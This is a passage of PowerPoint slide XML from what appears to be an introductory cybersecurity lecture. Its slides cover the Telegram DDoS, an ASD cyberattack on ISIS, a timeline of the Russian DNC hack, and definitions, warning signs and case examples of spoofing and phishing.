            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Used by protesters in Hong Kong to communicate and organize</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>June 12, 2019</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Telegram was hit by a DDoS attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Affected most of Telegram’s 200 million users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Telegram CEO reported that most of the IP’s originated from China</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232571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Australian Signals Directorate Attacks ISIS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4154984"/>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ASD is the Australian government agency responsible for foreign signals intelligence, support to military operations, cyber warfare, and information security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Conducted a remote cyberattack against ISIS commanders in the Middle East to disrupt communications, all coordinated with Coalition fighters on the ground.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“Daesh communications were degraded within seconds. Terrorist commanders couldn’t connect to the internet and were unable to communicate with each other.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The terrorists were in disarray and driven from their position – in part because of the young men and women at their keyboards some 11,000 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kilometres</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> or so from the battle.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>					- Mike Burgess, Director-General ASD</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32779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Russian DNC Hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839"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t>Mid-March 2016: Two cyber units of the Russian military agency called "GRU" send hundreds of spear-phishing emails to "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>hillaryclinton.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>" emails, DNC emails and Gmail accounts used by the Clinton campaign. The spear-phishing campaign allows them to gain access to John Podesta’s (campaign chairman) email accounts.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April 12, 2016 – GRU gains access to the Democratic Congressional Campaign Committee (DDDC) server.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April 18, 2016 – GRU gains access to the Democratic National Committee (DNC) server.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April 18-June 8, 2016 – GRU compromises more than 30 computers on the DNC network, infecting them with malware.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April 19, 2016 – GRU registers a domain name to release stolen documents. The website is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>dcleaks.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DCLeaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> also creates a Twitter, Facebook and email address.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28053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Russian DNC Hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="5509200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>June 14, 2016 – DNC announces the breach and theft of documents. That same day, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>DCLeaks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> and Guccifer 2.0 (both aliases of the Russian cyber military group) begin to communicate with WikiLeaks about combining forces.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June 15, 2016 – GRU uses the Guccifer WordPress blog to begin releasing data online.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June 22, 2016 – WikiLeaks tells Guccifer 2.0 “send any new material here for us to review and it will have a much higher impact than what you are doing.”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July 14, 2016 – Guccifer 2.0 sends stolen emails and documents to WikiLeaks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July 22, 2016 – WikiLeaks releases more than 20,000 emails and other documents stolen from the DNC computer networks, three days before the Democratic National Convention.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July 25, 2016 – The FBI begins probing the DNC hack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="161891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754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Providing fake identification or credentials, especially on a network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="233886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Russian DNC Hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>June-August 2016 – Guccifer 2.0 begins talking to reporters about opposition research they stole.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Between August 2016 and September 9, 2016 – Guccifer 2.0 makes contact with “a former Trump Campaign member,” and sends him documents and asks what he thinks of them.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October 7, 2016- WikiLeaks releases the first dump of Podesta emails stolen by GRU one hour after the Washington Post publishes Trump's Access Hollywood video.</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October 7-November 7, 2016 – WikiLeaks releases more than 50,000 documents stolen from Podesta's personal email account. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418063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Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="3046988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>What is phishing?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A form of fraud in which an attacker masquerades as a reputable entity or person in email or other communication channels.</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 attacker uses phishing emails to distribute malicious links or attachments that can perform a variety of functions, including the extraction of login credentials or account information from victims.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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50079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Phishing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="10266661" cy="4893647"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>How to identify phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Sent from a public email domain (Gmail, Yahoo, iCloud, AOL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Domain names are misspelled or inconsistent with email addresses and links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Poorly written</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Unfamiliar tone or greeting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Recipient did not initiate the conversation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Includes suspicious attachments or links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Creates a sense of urgency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Request for credentials, payment information or other personal details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" b="1"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303458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Phishing Scams</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="620414" y="1209583"/>
            <a:ext cx="9856839" cy="4401205"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Operation Phish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Phry</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>October 2009 – FBI announced that almost 100 people (half in US, half in Egypt) had been arrested for running a phishing ring.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Sent out official-looking emails that directed recipients to fake Wells Fargo and Bank of America websites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Walter Stephan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>FACC, a manufacturer of aircraft components for Boeing and Airbus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Cybercriminals faked emails from the CEO, targeted an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> entry-level accountant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Demanded transfer of $47 million to an unknown bank account as part of an acquisition project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
